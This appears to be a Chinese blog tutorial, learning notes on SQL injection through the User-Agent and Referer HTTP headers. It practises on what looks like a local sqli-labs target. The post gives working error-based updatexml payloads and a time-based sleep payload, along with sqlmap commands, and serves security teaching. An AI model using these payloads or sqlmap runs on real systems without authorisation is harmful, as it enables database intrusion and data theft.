HTTP 头中的 SQL 注入

最新推荐文章于 2024-01-21 11:57:44 发布
最新推荐文章于 2024-01-21 11:57:44 发布
阅读量295 收藏
点赞数
分类专栏: Web 安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43621629/article/details/104590235
版权

Web安全攻防 学习笔记

一、HTTP 头中的 SQL 注入


1.1、HTTP 头中的注入介绍

        在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如 SQL 注入中,用户提交 的参数都会被代码中的某些措施进行过滤。

        过滤掉用户直接提交的参数,但是对于 HTTP 头中提交的内容很有可能就没有进行过滤。


1.2、updatexml 函数

语法:UPDATEXML (XML_document, XPath_string, new_value);

  • 第一个参数:XML_document 是 String 格式,为 XML 文档对象的名称,文中为 Doc

  • 第二个参数:XPath_string( Xpath 格式的字符串)

  • 第三个参数:new_value,String 格式,替换查找到的符合条件的数据


1.3、HTTP User-Agent 注入

另一种闭合方式:' or '1' = '1

  • 一般我们会用 ' or 1=1 --+ 是得后续代码无效化,从而起到闭合作用

  • 但若网址做了 --+ 过滤,那么这种方式也就失效了

	' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1

	# concat 是将多个字符串组合成一个
	# 0x7e 表示 ~

	' and updatexml(1,concat(1,(select database())),1) or '1' = '1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


1.4、HTTP Referer 注入

	' or if(1=1,sleep(5),null)  or '1'='1

  1. 先加个 \ 看看是否存在注入点
    在这里插入图片描述
    在这里插入图片描述

  2. 存在,则进行注入
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述


1.5、sqlmap 安全测试

  1. sqlmap 自动搜索 POST 表单注入
	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --forms --banner --batch

	# 探测不出来

  1. sqlmap 指定参数探测 SQL 注入
	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --data="uname=admin&passwd=admin" --banner --batch
	
	# 还是没有, 说明 uname 与 passwd 可能不存在注入点
	# 再提高 level 试试(探测内容更多)

	$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-19/" --data="uname=admin&passwd=admin" --banner --batch -level 3

  1. sqlmap referer 注入把 referer 改成 * 或者在后面加上 *(其他参数也行,如 User-Agent 注入再 User-Agent 后面加一个 *
	$ python sqlmap.py -r target.txt --banner

在这里插入图片描述
在这里插入图片描述

白菜执笔人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞-06】HTTP头部注入靶场实战
cc
02-05 6298
常见的sql注入一般是通过请求参数或者表单进行注入HTTP头部注入是通过HTTP协议头部字段值进行注入。updatexml()函数回显字符长度有限,先获取用户数量,再逐一获取用户名和密码需要找到注入点 才能够闭合引号的注入参数。
http头部注入
我不是大牛
06-25 5727
http头部注入 我们首先可以在浏览器设置手动代理模式,然后通过burpsuite进行代理配置后进行抓包,如下是一个网站登录页面的http头部信息: POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/201...
HTTP注入
ssslq的博客
03-02 743
HTTP头部,User-Agent、XFF注入
SQL注入实战:http报文包讲解、http注入
最新发布
ting_liang的博客
01-21 908
400 Bad Request:本状态码表示客户端提交了一个无效的HTTP请当以某种无效的方式修改请求时(例如在URL中插人一个空格券可能会遇到这个状态码。XForrwarded For:是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不同的TCP连接。1、在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生例如SOL注入中,用户提交的。
14、SQL注入——HTTP文件头注入
qq_55202378的博客
12-05 471
(1)请求报文由客户端发给服务器得消息,其组成包括请求行、请求头域和请求体。HTTP请求方法GET :请求指定得页面信息,并返回实体主体。HEAD:类似GET请求,只不过返回得响应中没有具体内容,用户获取报头。POST:向指定资源提交数据进行处理请求(例如提交表单或上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的建立或已有资源的修改。PUT:从客户端向服务器传送的数据取代指定的文档内容。DELETE:请求服务器删除指定的页面。
SQL注入-HTTP注入
m0_72125469的博客
11-24 221
SQL注入-HTTP注入
【web安全】——HTTP请求头注入
Demo不是emo的博客
01-10 4573
http请求头注入操作
SQL注入HTTP注入漏洞
Eagle_pompom的专栏
04-25 4054
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的头,包括User-agent和Referer头字段 潜在的HTTPSQL注入有:Cookie, User-agent, R...
通过 HTTP 头进行 SQL 注入(转)
听雨轩
12-11 629
  在漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的,以及讨论下选择哪种漏洞扫描器测试SQL注入。 作者:Yasser Aboukir, InfoSec Institute 在 漏洞评估和渗透测试中,确定目标应用程序的输入向量是第一步。有时,当做web应用程序测试时,SQL注入漏洞的测试用例通常局限于特殊...
HTTP头中SQL注入
qq_43776408的博客
06-12 482
HTTP头中注入介绍 左边代码if判断是否是空 不空的话执行括号内的 然后判断是否有单引号和数字 最后返回用户的输入 HTTP User-Agent注入 我们先以Less-18为例 浏览器打开less-18 输入密码和账户然后开启burp进行抓包 抓到以后 send repeater 修改当中user-agent内容 如下 你可以在select后面改为@@version 这样就能看到数据库版本了 你也可以改为database() 就可以看到当前使用的数据库名了 即你可以构造你想要的数据的sql语句
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
Hibernate使用中防止SQL注入的几种方案
01-20
Hibernate使用中防止SQL注入的几种方案 Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。  在获取便利操作的同时...
SQL注入——HTTP头部注入
qq_52072846的博客
02-18 2704
实验目的 理解HTTP头部字段User-Agent、Referer、Cookie、X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理、方法及基本流程。 实验原理 有时候,后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证 等)或者通过HTTP Header头信息获取客户端的一些信息(比如 User-Agent. Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Hea
SQL注入HTTP头部注入
QYbkx974的博客
11-07 221
1.堆叠查询2.宽字节注入3.Cookie 注入4.base64 注入5.User-Agent 注入6.referer 注入
网络安全——HTTP头部注入
weixin_54055099的博客
09-16 6826
SQL注入HTTP头部注入,两个例子:Use-Agent注入、XFF注入
dedecms中的sql注入
05-19
DedeCMS 是一款基于 PHP 和 MySQL 的开源 CMS 系统,它的 SQL 注入漏洞是指攻击者可以通过在输入框中注入恶意 SQL 代码,从而实现对数据库的非法操作。 常见的 DedeCMS SQL 注入漏洞主要出现在以下几个方面: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值